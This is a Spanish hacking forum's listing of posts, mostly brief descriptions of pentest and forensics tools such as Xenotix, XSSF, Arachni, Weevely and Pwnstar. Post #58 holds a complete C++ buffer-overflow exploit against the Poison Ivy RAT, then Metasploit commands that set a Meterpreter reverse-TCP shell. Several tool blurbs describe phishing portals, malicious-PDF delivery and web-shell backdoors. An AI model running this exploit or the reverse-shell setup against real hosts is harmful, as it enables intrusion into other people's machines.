Actualmente, Bizploit viene con muchos plugins para evaluar la seguridad de plataformas de negocios SAP. Plugins para otros ERPs populares se incluirán en el corto plazo.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#58

Código: text
# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <[email protected]>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.

/* Poison Ivy 2.3.2 Remote Buffer Overflow
* Author: Kevin R.V <[email protected]>
* Date: 2011
* License: Totally free
* */

#include <iostream>
#include <winsock2.h>

#define VERS "0.1"

int connected;
using namespace std;

char payload[] = {
0xb2, 0xa8, 0xc3, 0x17, 0x1c, 0x1b, 0x99, 0xb9,
0x4c, 0xab, 0x8b, 0x88, 0x3a, 0x20, 0x13, 0xb3,
0x72, 0x0e, 0x57, 0xbc, 0x9f, 0x81, 0xb9, 0x08,
0x61, 0x30, 0x87, 0x74, 0xea, 0x65, 0xb5, 0x4a,
0xc9, 0xfc, 0x87, 0xe3, 0x95, 0x9e, 0xcd, 0xcd,
0x40, 0x98, 0xd2, 0x1f, 0x31, 0xee, 0x96, 0x83,
0x3d, 0x0a, 0xfe, 0xb8, 0x9b, 0xf2, 0xe7, 0x10,
0x23, 0x64, 0xfe, 0xe9, 0x10, 0xc4, 0x9c, 0xf7,
0x29, 0xe5, 0x6b, 0xe3, 0x54, 0xbb, 0x18, 0x8b,
0x07, 0x81, 0x92, 0x5e, 0xbb, 0x35, 0x6f, 0xe4,
0x23, 0x4a, 0x0c, 0xd0, 0x1f, 0x3b, 0xd4, 0x9a,
0x5c, 0x94, 0xad, 0x8b, 0xed, 0xa4, 0xed, 0xb2,
0x14, 0x23, 0x04, 0xa5, 0xfd, 0x8e, 0x8c, 0x9b,
0xc8, 0x0f, 0x78, 0xbf, 0xf2, 0xe4, 0xfe, 0x28,
0xe9, 0x3c, 0x5d, 0x86, 0x16, 0xff, 0x59, 0x7d,
0x70, 0x6d, 0x18, 0x2d, 0xdf, 0x28, 0x66, 0x02,
0xde, 0xca, 0x20, 0xe6, 0xfd, 0xe7, 0xbf, 0x4d,
0xe8, 0x8c, 0x69, 0xdd, 0x40, 0x22, 0x8f, 0x2f,
0x55, 0x54, 0xb1, 0x60, 0x86, 0x29, 0xd0, 0x3d,
0xc7, 0x01, 0xb5, 0xdc, 0xbf, 0x63, 0x28, 0xd2,
0x4e, 0xe6, 0x29, 0xed, 0x5c, 0xee, 0x17, 0x53,
0xe1, 0x11, 0x5c, 0x61, 0x9b, 0xb0, 0xfc, 0x71,
0x6e, 0x46, 0xa9, 0x27, 0xa8, 0x21, 0x05, 0x67,
0x86, 0x24, 0x86, 0x01, 0xb8, 0xd7, 0x65, 0x11,
0x36, 0xe5, 0x16, 0x05, 0xdc, 0x8c, 0x7c, 0xa7,
0xb9, 0xee, 0xbe, 0xa6, 0xcf, 0x88, 0x67, 0x56,
0xaa, 0x61, 0xe3, 0x2c, 0x72, 0xbf, 0x5b, 0xee,
0x18, 0xc4, 0x65, 0x2c, 0x4a, 0x0d, 0x88, 0x2e,
0xad, 0x96, 0x67, 0xab, 0xc1, 0xb1, 0x95, 0x03,
0x36, 0xc8, 0x04, 0xbf, 0xe8, 0x29, 0x5a, 0xf5,
0x83, 0xe5, 0x5f, 0xe4, 0x0e, 0xe2, 0x6f, 0x6b,
0x93, 0x80, 0xe7, 0x25, 0xca, 0x44, 0xa8, 0x48 };


char payload2[] = {
0xc6, 0xa7, 0x53, 0xce, 0xdc, 0x1c, 0xdc, 0x74,
0x9a, 0xc7, 0x31, 0xdf, 0x2a, 0x21, 0x5f, 0x0e,
0x7e, 0xe6, 0x1e, 0xa1, 0xb5, 0x17, 0xc4, 0x9f,
0x4a, 0x7a, 0x81, 0xde, 0x90, 0x13, 0x37, 0x2d,
0x62, 0x3c, 0xb6, 0x10, 0x2d, 0x44, 0x57, 0xa2,
0xa0, 0xdd, 0xcb, 0x90, 0xd3, 0x83, 0x1a, 0xda,
0x89, 0x97, 0x68, 0x61, 0xce, 0x38, 0xc1, 0xc4,
0xe8, 0xb0, 0xfa, 0x0b, 0x64, 0x12, 0x73, 0xf0,
0x28, 0x24, 0x2b, 0x51, 0x78, 0x15, 0xfa, 0x27,
0xcc, 0xc7, 0x5c, 0x5c, 0x3a, 0xf8, 0xea, 0x5e,
0xd9, 0x6e, 0xd4, 0x96, 0xa0, 0x8d, 0x99, 0x13,
0x84, 0x99, 0xff, 0xba, 0x41, 0xed, 0xf3, 0x1c,
0x67, 0xb6, 0xaa, 0x5a, 0x95, 0xfd, 0x92, 0x23,
0x9a, 0x72, 0x86, 0xcd, 0xf6, 0xa1, 0xb9, 0x44,
0xbc, 0x15, 0xc3, 0xac, 0xaa, 0xd6, 0x65, 0xf1,
0x08, 0x19, 0xf5, 0x2a, 0x62, 0xe4, 0x0d, 0x4e,
0x14, 0x1f, 0x21, 0x4d, 0x0c, 0x22, 0x06, 0x98,
0x84, 0x74, 0xf7, 0xaa, 0x18, 0x90, 0xd7, 0xe5,
0x2d, 0x04, 0x45, 0xb4, 0x2f, 0xbc, 0xdc, 0x97,
0xd2, 0x9b, 0x25, 0xe5, 0x4d, 0xb3, 0x51, 0x5f,
0x1a, 0x93, 0xe4, 0x97, 0x51, 0xc7, 0xd9, 0x81,
0x52, 0xee, 0x11, 0x83, 0x51, 0xb1, 0xd5, 0x34,
0x6f, 0xf1, 0xea, 0x9e, 0xbf, 0x4b, 0x6e, 0x33,
0x0d, 0x8a, 0x73, 0x15, 0xb9, 0xde, 0x92, 0x53,
0xd3, 0xfd, 0x5a, 0xcf, 0x69, 0xde, 0x19, 0x29,
0x05, 0xa1, 0x50, 0x78, 0x14, 0x81, 0xe5, 0xf1,
0x74, 0xea, 0x8c, 0x82, 0x58, 0x93, 0x74, 0x4f,
0x5a, 0x77, 0xb5, 0xde, 0x17, 0xd1, 0x48, 0x44,
0x1b, 0x1f, 0x32, 0x30, 0x9f, 0x64, 0x7c, 0x22,
0x4e, 0xd4, 0x1a, 0xae, 0x77, 0x01, 0x2b, 0x1f };


char payload3[] = {
0xe0, 0xf5, 0x3d, 0xc1, 0xf0, 0xea, 0x15, 0xdb,
0x43, 0x3e, 0x65, 0xf8, 0x9b, 0xe2, 0x14, 0xba,
0x90, 0x48, 0x5c, 0xd5, 0xec, 0x70, 0xa3, 0x8b,
0x41, 0x72, 0x28, 0x50, 0xec, 0xf6, 0xd5, 0x2a,
0xe6, 0x06, 0x46, 0xb2, 0xc5, 0x0c, 0x96, 0x6a,
0x69, 0x86, 0x6b, 0x12, 0xe4, 0x93, 0xe5, 0x11 };



int PoC(char * host, unsigned int port)
{
WSADATA wsa;
WSAStartup(MAKEWORD(2,0),&wsa);
SOCKET sock;
struct sockaddr_in local;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
local.sin_family = AF_INET;
local.sin_addr.s_addr = inet_addr(host);
local.sin_port = htons(port);
if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 )
{
connected = 1;
cout << ".";
for(long int i = 0; i<99; i++)
{
sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local));
sendto(sock, payload2, sizeof(payload2), 0, (struct sockaddr *)&local,sizeof(local));
sendto(sock, payload3, sizeof(payload3), 0, (struct sockaddr *)&local,sizeof(local));
}

PoC(host, port);
}

else
{
if ( connected )
cout << endl << endl << "[+] Congrats, poison-ivy crashed!!" << endl;
else
cout << endl << endl << "[-] Sorry not poison ivy detected 8-(" << endl;
}
}
int main(int argc, char *argv[])

{
cout << "Poison-ivy remote buffer overflow " VERS << endl << endl;
cout << "by Kevin R.V <[email protected]" << endl;
if ( argc < 2 )
{
cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl;
exit(-1);
}

u_short port;
char * ip;

for(int i = 0; i<argc; i++)
{
if( ! strcmp(argv[i], "-h") != 0 )
ip = argv[i+1];
else if( ! strcmp(argv[i], "-p") != 0 )
port = atoi(argv[i+1]);
}

cout << "[+] Starting exploit" << endl << endl;
PoC(ip, port);


return 1;
}


Explotación del Remote Buffer Overflow desde el Mestasploit.

Citaruse exploit/windows/misc/poisonivy_bof

Citarmsf exploit(poisonivy_bof) > set PAYLOAD windows/meterpreter/reverse_tcp

Citarmsf exploit(poisonivy_bof) > set LHOST [MY IP ADDRESS]

Citarmsf exploit(poisonivy_bof) > set RHOST [TARGET IP]

Citarmsf exploit(poisonivy_bof) > exploit

#59
Bugs y Exploits / Xenotix XSS Exploit Framework
Enero 20, 2013, 11:12:10 PM

Es un proyecto OWASP liderado por Ajin Abraham, que consiste en proporcionar un framework a los "Pentester" para detectar y explotar vulnerabilidades XSS. Este framework es capaz de inyectar código XSS en la páginas WEB escaneadas y en las que se ha detectado una vulnerabilidad presente.

En definitiva Xenotix es la unión perfecta entre una herramienta XSS Scanner y aquella que permite poner a prueba dichas vulnerabilidades XSS Explotation Kit. Con Xenotix se tiene la herramienta perfecta para los Pentester, o lo que es lo mismo, para los profesionales de poner a prueba las aplicaciones web.

¿Cómo funciona?

El funcionamiento es muy sencillo, se proporciona la URL de la página WEB y la variable que va a ser analizada, en la intefaz (GUI) del framework.

Luego existe dos modo de operación: Manual y Automático. En el modo automático la herramienta realizará un prueba automática de detección e inyección de "payload" en la página variable de la URL proporcionada.

Una vez confirmada la vulnerabilidad podrá inyectarse un "payload" especifico como por ejemplo una shell inversa.

Características:

Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
XSS Reverse Shell (new)

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#60
Bugs y Exploits / XSSF
Enero 19, 2013, 09:21:24 PM

Es una herramienta de seguridad diseñada para convertir la tarea de explotación de la vulnerabilidad XSS en un trabajo mucho más fácil. El XSSF pretende demostrar los peligros reales de vulnerabilidades XSS, vulgarizing su explotación. Este proyecto es creado exclusivamente para educación, pruebas de penetración y propósitos de la investigación legal

XssF permite administrar victimas de ataques XSS genéricos y persiste una conexión con dichas victimas por medio de un "loop" en javascript, el cual se encarga de enviar peticiones reversas en intervalos definidos de tiempo con el fin de ejecutar exploits contra la victima.

XssF es utilizado en Metasploit como un plugin adicional que se carga en el momento en el que se decida hacer uso de el, al igual que otras extensiones, se emplea el comando load para cargarlo en el contexto de metasploit, sin embargo antes de cargarlo, se debe tener en cuenta que las primeras instrucciones que se llevaran a cabo por el plugin, son la conexión con una base de datos para almacenar los resultados de las pruebas de penetración ejecutadas.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#61
Bugs y Exploits / Proxy Strike Toolkit
Enero 02, 2013, 07:45:01 PM

ProxyStrike v2.1 es una herramienta diseñada para encontrar vulnerabilidades mientras navega por una aplicación. Fue creada debido a los problemas que enfrentamos en los pentests de aplicaciones web que depende en gran medida de JavaScript.

En este momento se dispone con plugins de inyección SQL y XSS. Ambos plugins están diseñados para capturar las vulnerabilidades. El proceso es muy simple, ProxyStrike funciona como un proxy escucha en el puerto 8008 por defecto, así que tienes que navegar por el sitio Web que desee configurar su navegador para usar ProxyStrike como un proxy, y ProxyStrike analizará todos los parámetros en modo de fondo.

Características:

- Plugin de motor (Crea tus propios plugins!)
- Solicitud de interceptor
- Solicitar diffing
- Solicitud de repetidor
- Proceso de rastreo automático
- Solicitud/respuesta HTTP historia
- Estadísticas de petición de parámetro
- Solicitar valores de los parámetros estadísticas
- URL de la petición de parámetro y la firma de campo de la cabecera
- El uso de un proxy alternativo (TOR, por ejemplo)
- Sql ataques (plugin)
- Server Side Includes (plugin)
- Ataques XSS (plugin)
- Registros de ataque
- Exportación de resultados a HTML o XML


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#62
Bugs y Exploits / Arachni
Diciembre 21, 2012, 05:26:50 PM

Arachni es un framework que nos permite realizar ataques sobre una aplicación web y
obtener las vulnerabilidades encontradas.

¿Qué pruebas podemos realizar con él?

Arachni posee los siguientes modulos con los que poder realizar pruebas sobre una aplicación web

-Path_traversal
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-os_cmd_injection_timing/os_cmd_injection
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-response_splitting
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-xpath
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-xss/xss_event/xss_uri/xss_tag/xss_path
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-code_injection/code_injection_timing
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-sqli_blid_rdiff /sqli_blind_timing
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-rfi(Remote File Inclusion)
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-unvalidated_redirect
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-ldapi
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-csrf
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-sqli
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-xst
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

-unencrypted_password_forms
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#63
Hacking / Inguma
Diciembre 21, 2012, 05:24:32 PM

Inguma es una Herramienta de "Penetration Testing and Vulnerability Discovery Toolkit" escrita enteramente en python y con licencia GNU General Public License (GPL).

Ademas de sus conocidos modulos de exploración, Information Gathering, Fuerza Bruta, Exploits, Disassembler, esta nueva version ademas de resolver multiples bugs, incluye un modulo de Fuzzing y nueva interface grafica.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#64
Informática Forense / Mobius Forensic Toolkit
Diciembre 21, 2012, 05:23:13 PM

Mobius Forensic Toolkit es un marco forense escrito en Python / GTK que gestiona los casos y artículos de casos, proporcionando una interfaz abstracta para el desarrollo de extensiones.Casos y categorías de artículos se definen mediante los archivos XML para una fácil integración con otras herramientas.

Instalación:

Citarpython No tienes permitido ver enlaces. Registrate o Entra a tu cuenta install

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#65
Informática Forense / Forensics Data Identifier
Diciembre 21, 2012, 05:22:28 PM

Forensics Data Identifier o FDI es un instrumento que permite que los grandes archivos de datos sean fácilmente filtrados para tipos de datos forenses pertinentes comunes.

La herramienta fue diseñada para acelerar los procesos de descubrimiento y análisis de la investigación forense.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#66
Hacking / Pwnstar
Diciembre 21, 2012, 05:21:13 PM

Es un script bash para lanzar un Soft AP, configurable con una amplia variedad de opciones de ataque.

Incluye una serie de index.html y el servidor scripts php, por inhalación / phishing.

Puede actuar como multi-cliente de portal cautivo utilizando php y iptables.

Lanza hazañas clásicas como el mal-PDF.

De-auth con aireplay, airdrop-ng o MDK3.

Use sólo los paquetes marcados como "versión actual" con la versión más reciente de PwnSTAR. Mayores paquetes de trabajar sólo con mayores de esa edad (en desuso) versiones del guión. PwnSTAR.tgz es un paquete que contiene la versión actual de la secuencia de comandos + todas las páginas web requeridas.

"hotspot_3" es una página web de phishing simple, utilizado con 4 basic opción de menú.

"portal_simple" es un portal cautivo que le permite editar el index.html con el nombre del portal por ejemplo "CyberCafe de Joe". Se utiliza para la inhalación.

"portal_hotspot3" phishes credenciales y, a continuación, permite a los clientes a través del portal de internet.

"portal_pdf" obliga al cliente para descargar el pdf malicioso con el fin de pasar a través del portal.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#67
Hacking / Dradis
Diciembre 21, 2012, 05:20:12 PM

Dradis es una herramienta que permite el compartir y recopilar la información que se va obteniendo durante auditorías de seguridad en sistemas y en aplicaciones web, así como en tests de intrusión.

A modo de repositorio, nos permite además importar ficheros de herramientas tan conocidas como Nessus, Nikto, Nmap, Burp, Nexpose, OpenVAS, w3af, ZAProxy, NSS...y un largo etc, ya que permite la creación de más plugins para importar cualquier tipo de información y organizarla dentro del proyecto basándose en la salida de las pruebas realizadas.

Programada en Ruby, la información se organiza y registra vía un interfaz web tras la instalación, en la cual se comienza con la creación de carpetas o nodos, incluyendo posteriormente los sistemas y anotaciones pertinentes, apoyándose en la información obtenida de herramientas y así organizar en un mismo punto todo lo que se vaya avanzando durante las pruebas de seguridad. La aplicación no distingue a los usuarios (se accede con un nombre de usuario pero no se registra previamente en el sistema), valiéndose únicamente de una contraseña establecida a modo de servidor  para consultar la información que se encuentre disponible y volcada en los proyectos.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#68
Bugs y Exploits / Webscarab
Diciembre 21, 2012, 05:18:45 PM


Webscarab es un marco de trabajo para analizar aplicaciónes web que se comunica usando los protocolos HTTP y HTTPS. Esta escrito en Java, por lo que es portable a muchas plataformas. WebScarac tiene muchos modos de operación, implementados por varios plugins. Su uso mas común es operar WebScarab como un proxy de intercepción, que permite al operador revisar y modificar las peticiones creadas por el navegador antes de que sean enviados al servidor, y para revisar y modificar respuestas enviadas por el servidor antes de que sean recividas por el navegador. Webscarab es capaz de interceptar comunicacion en HTTP y HTTPS. El operador puede tambien revisar las conversaciones (peticiones y respuestas) que hayan pasado por WebScarab.

Instalación:

CitarLinux: java -jar ./webscarab-selfcontained-[numbers].jar
Windows: de doble clic al archivo Jar de instalación

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta




WebScarab-NG

WebScarab-NG es una reescritura completa de la aplicación de la antigua WebScarab, con especial énfasis en hacer la aplicación más fácil de usar.



Instalación:

Citarjava -jar WebScarab-ng-X.X.X.one-jar.jar

Donde X.X.X es la versión descargada.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#69
Bugs y Exploits / WebSurgery
Diciembre 21, 2012, 05:16:27 PM

WebSurgery es un conjunto de herramientas para pruebas de seguridad de aplicaciones web. Fue diseñado para ayudar a los auditores de seguridad en la planificación de las aplicaciones web y la explotación. En la actualidad, se utiliza un Web Crawler que es eficiente, rápido y estable, File/Dir Brute Forcer, Fuzzer para la explotación avanzada de vulnerabilidades conocidas y poco comunes, tales como inyecciones SQL, Cross Site Scripting (XSS), La fuerza bruta de las formas de acceso, identificación de los cortafuegos reglas de filtrado, ataques DOS y Web Proxy para analizar, interceptar y manipular el tráfico entre el navegador y la aplicación web de destino.

WEB Bruteforcer
WEB Bruteforcer es un analizador por fuerza bruta de los archivos y directorios dentro de la aplicación web que ayuda a identificar la estructura oculta. También es multi-threaded y completamente parametrable para los ajustes de tiempo (tiempo de espera, Threading, Tamaño máximo de los datos, los reintentos) y reglas (encabezados, Base de Dir, Dirs fuerza bruta / Files, extensión de archivo recursiva, es, envía / HEAD, las redirecciones, Las cookies y configuración del proceso generador de la lista). Por defecto, aplicará la fuerza bruta del directorio raíz / base recurrentemente para los archivos y directorios. Se envía la cabeza y las peticiones GET cuando se necesita (HEAD para identificar si el archivo/directorio existe y luego llegar a recuperar la respuesta completa).

WEB Fuzzer
WEB Fuzzer es una herramienta más avanzada para crear una serie de peticiones sobre la base de una solicitud inicial. Fuzzer no tiene límites y puede ser utilizado para explotar las vulnerabilidades conocidas, (ciegos) inyecciones SQL y las formas más inusuales como el manejo identificando datos incorrectos, firewall / reglas de filtrado, los ataques DoS.

WEB Editor
Un editor web sencillo para enviar las solicitudes individuales. También contiene un editor hexadecimal para las peticiones más avanzadas.

WEB Proxy
Web Proxy es un proxy server que funciona a nivel local y le permitirá analizar, interceptar y manipular HTTP / HTTPS solicitudes procedentes de su navegador u otra aplicación que soportan proxies.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#70
Softwares e ISOs / TestDisk
Diciembre 09, 2012, 03:19:18 PM
TestDisk fue principalmente diseñado para ayudar a recuperar particiones perdidas y/o volver discos no booteables a booteables nuevamente cuando estos síntomas son causados por software con fallas, ciertos tipos de virus o error humano (como borrar accidentalmente su Tabla de Particiones). La recuperación de la Tabla de Particiones usando TestDisk es realmente fácil.

TestDisk puede

    Arreglar la Tabla de Particiones, recuperar particiones eliminadas
    Recuperar sectores de arranque FAT32 de su copia de seguridad
    Reconstruir sectores de arranque FAT12/FAT16/FAT32
    Arreglar tablas de arranque de tipo FAT
    Reconstruir sectores de arranque NTFS
    Recuperar sectores de arranque NTFS de su copia de seguridad
    Arreglas la MFT usando la MFT imagen
    Localizar el Superblock de copia de seguridad de ext2/ext3/ext4
    Recuperar archivos del sistema de archivos FAT, NTFS y ext2
    Copiar archivos de particiones FAT, NTFS y ext2/ext3/ext4 eliminadas

TestDisk tiene características para expertos y principiantes. Para aquellos que saben poco o nada sobre técnicas de recuperación de datos, TestDisk puede ser usado para recolectar información detallada sobre un disco que no se inicia o arranca, la cual después puede ser enviada a un técnico para mayor análisis.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#71
Bugs y Exploits / CookieDigger
Diciembre 05, 2012, 12:47:32 PM
CookieDigger ayuda a identificar la creacion débil de la cookie e implementaciones inseguras de la administración de la sesión por aplicaciones de la web. El instrumento trabaja reuniendo y analizando las cookies publicadas por una aplicación web para múltiples usuarios. El tool informa en la previsibilidad y entropía de la cookie y si la información es crítica, tal como el nombre de usuario y contraseña, se incluyen en los valores de la cookie. Requiere .NET Framework.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#72
Bugs y Exploits / HttPrint: Analizar servidores web
Diciembre 05, 2012, 12:02:18 PM

HttPrint es una herramienta que nos permite obtener información importante acerca de los servidores web. Algunas de sus características son:

    Obtener información de servidores web teniendo cadenas de ofuscación.
    Detecta y muestra los dispositivos de red ( impresoras, routers, puntos de acceso inalámbricos..).
    Detectar cuando un servidor a movido su contenido a otros servidores.
    Detecta automáticamente SSL, detecta si el puerto SSL está activado o no.
    Disponible para Linux, Mac OS X, FreeBSD (sólo en línea de comandos), y Win32 ( interfaz gráfica y línea de comandos).

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#73
Informática Forense / Informatica Forense
Diciembre 04, 2012, 09:21:32 PM
La disciplina forense adaptada al ámbito de las nuevas tecnologías, surge como respuesta al auge delincuencial que utiliza como apoyo o medio cualesquiera soportes electrónicos.

En el momento actual son muchos los casos en los que se obtienen distintos medios de prueba, vitales para el éxito de una investigación, de discos duros, teléfonos móviles, PDAs y sistemas GPS.

No olvidemos que la finalidad de las técnicas forenses aplicadas al medio digital, no es otra que contribuir a detener y judicializar a los culpables de un hecho y contar con las pruebas de cargo apropiadas que resulten en una sentencia condenatoria, o, en el caso contrario, exculpar a un inocente.

Una definición apropiada, podría ser "La preservación, recuperación y análisis de la información almacenada en las computadoras u otros medios electrónicos"

Para ello, el investigador cuenta con distintas herramientas que le facilitarán la tarea, es preciso tener presente la ingente cantidad de datos a examinar y el reto que supone, más aún en una especialidad relativamente reciente, que carece de un estándar consensuado en cuanto a medios y técnicas.

Por lo tanto, por regla general, depende del interés, tesón y capacidades del investigador el éxito del proceso.

¿Qué se puede lograr mediante el uso de la informática forense?

1-Recuperación de archivos ocultos, borrados o dañados
2-Identificación de rutas, modificaciones y autoría de documentos y datos
3-Acceso a información protegida o cifrada, revelado de contraseñas
4-Seguimiento de transferencias de archivos, correos electrónicos, sesiones de chat, comunicaciones vía red (Internet) y VoIP
5-Identificación de origen y destino. Rastreo de archivos en Cloud computing
6-Posicionamiento e historial de dispositivos dotados de GPS
7-Auditoría de actividad en computadores y dispositivos electrónicos.
8-Pruebas de penetración y certificación de seguridad de redes y sistemas
9-Estudio de virus, troyanos... back orifice, rootkits. Ingeniería inversa

¿Aplicaciones prácticas ?

Las técnicas forenses en el entorno digital, cuentan con un amplio horizonte de aplicación, desde la recuperación de información en soportes informáticos intervenidos, por ejemplo en casos de terrorismo, fraude fiscal, malversación de fondos, espionaje industrial o civil. Hasta la geolocalización y seguimiento del historial de dispositivos GPS, móvil y VoIP, que pueden resultar decisivos en cualquier investigación policial.

Principales herramientas

Forensics Toolkit.-
Vale la pena mencionar esta suite, creación de Farmer y Venema, pioneros de la informática forense, enfocada fundamentalmente al tratamiento de soportes sólidos, en cuanto a la recuperación de información.

Microsoft Coffee.-
Microsoft, ha desarrollado y puesto a disposición de las distintas agencias de seguridad, el programa Coffee. Se trata de una utilidad ligera, que puede portarse en un dispositivo USB con más de 150 funciones automatizadas, que facilitan la toma de evidencias in-situ de forma rápida y eficaz.

EnCase.-
Lider del sector, Guidance Software, comercializa distintas soluciones integradas bajo la denominación EnCase; Enterprise, eDiscovery, Cybersecurity. Que cubren todo el espectro posible en el ámbito pericial y de seguridad corporativa, desde el estudio de soportes y memorias temporales, hasta la investigación de paquetes de red, ruteados y cadenas de datos.

OSForensics.-
Actualmente en fase Beta y de distribución gratuita, se trata de una completa suite, con la que realizar la mayoría de las tareas habituales; Clonado DD, Comparación de cadenas, cálculo de hashes... Incorpora un potente gestor que discrimina eficazmente los archivos no relacionados, facilitando al investigador su labor.

Helix.-
Se trata de un liveCD basado en la distribución de Linux Ubuntu, modificada para su uso como herramienta forense, incorpora una gran variedad de programas útiles.


Estas son solo algunas de las aplicaciones disponibles para la práctica forense, si, por ejemplo, nuestra intención es realizar una auditoría de seguridad, podemos usar la distribución de Linux BlackUbuntu, especialmente preparada para llevar a cabo acciones de penetración.

Con el auge de las redes P2P y el uso malicioso de su soporte para la distribución de archivos susceptibles de ser considerados como pornografía infantil, se plantea un nuevo reto, principalmente a la hora de identificar y rastrear archivos o partes de los mismos. El programa Disector puede ser de gran ayuda para lograrlo, ya que permite decodificar cualquier trama de datos parcial capturada.

También son muy necesarias aplicaciones que faciliten el seguimiento de correos electrónicos, Emailtracker y Visualware son algunos de las más destacados, se encargarán de rastrear el origen de cualquier email con sorprendente eficacia.

Por último, resulta imprescindible contar con uno o varios programas de recuperación y descodificación de contraseñas, su utilidad es más que evidente, John the Ripper, SnadBoy's Revelation y Cain son algunos de los más conocidos.

Sin embargo, si en lugar de a las típicas contraseñas de Windows, Bios, aplicaciones comerciales y archivos del tipo Officce, nos enfrentamos a un nivel de seguridad superior, con hashes MD4, MD5 y NTLM1, será preciso recurrir a herramientas más especializadas como MDcrack o la suite PenTBox (RIPemd-160).

Conclusiones
Es esta una disciplina en ebullición, cada día, cada minuto, surgen nuevas formas de vulnerar los sistemas de seguridad, logaritmos de encriptación más potentes y medios para evitar el seguimiento por parte de los investigadores forenses.

Un buen ejemplo de ello, sobre todo por su implicación en la situación social actual en determinados países de oriente medio, es el programa multiplataforma TOR.


TOR, protege la identidad del usuario, evitando que sus comunicaciones y actividad en la red pueda ser supervisada o rastreada por cualquier medio, se trata de una de las aplicaciones más eficaces en este sentido.

Su uso en combinación con las técnicas tradicionales de ocultación, camuflaje de MACs, saltos múltiples de proxy, conexiones mediante redes públicas o intervenidas, convierte el rastreo del origen y la identificación plena del autor en una utopía.

El especialista en seguridad o investigador perito forense, debe dedicar gran parte de su tiempo al aprendizaje, reciclaje y a la experimentación con toda nueva herramienta que caiga en sus manos.

En el momento actual no existe ningún tipo de formación reglada, que pueda servirle de base para su actividad, sin embargo, gracias a la red, es posible obtener información actualizada constante, en los distintos grupos dedicados a la materia, principalmente a nivel internacional.

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#74
Bugs y Exploits / Weevely
Diciembre 04, 2012, 07:58:54 PM

Weevely es un PHP shell web que simulan tipo conexión telnet. Es una herramienta esencial para la explotación posterior de aplicaciones web, y se puede utilizar como backboor para gestionar las legit web accounts, incluso host gratuitos.

Weevely se incluye actualmente en backtrack, backbox y otras distribuciones de Linux para pruebas de penetración.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#75
Hacking / Netifera
Noviembre 27, 2012, 04:30:51 PM


Netifera, es una nueva plataforma modular de código abierto para la creación de herramientas de seguridad de red. Este proyecto ofrece muchas ventajas para desarrolladores e investigadores de seguridad que deseen aplicar nuevas herramientas, así como a la comunidad de usuarios de estas herramientas. Ofrece entre otras las siguientes prestaciones:

* Completo soporte para IPv6
* TCP y UDP de exploración de red
* Servicio de detección
* Sistema operativo de identificación
* DNS inversa de exploración
* Nombre DNS por fuerza bruta
* Recopilación de información de Transferencia de zona DNS
* Información geográfica acerca de direcciones de red
* Ataque de autenticación por fuerza bruta (en contra de HTTP, FTP, IMAP y POP3)
*Rastreador de aplicaciones Web, recoge direcciones de correo electrónico y agrega la estructura del sitio con el modelo
*Integrado de la terminal para la conexión a la red e interactuar con los servicios

Netifera esta disponible para Linux y Mac OS X

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#76
El tutorial es del año 2,000 pero es muy interesante.




La palabra SoftIce define perfectamente lo que esta gran herramienta significa, "congela" el software para su posterior preparación, de la misma manera que podemos congelar las barras de pan y al día siguiente comernoslas bien calentitas después de haberlas pasado por el microondas.  En este tutorial hará un repaso de los comandos más básicos, creación de macros y personalización del inicio del SoftIce.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#77
Visitando CrackSLatinoS me encontre esto.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta




No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#78
Bugs y Exploits / SEAT (Search Engine Assessment Tool)
Noviembre 23, 2012, 11:20:11 PM

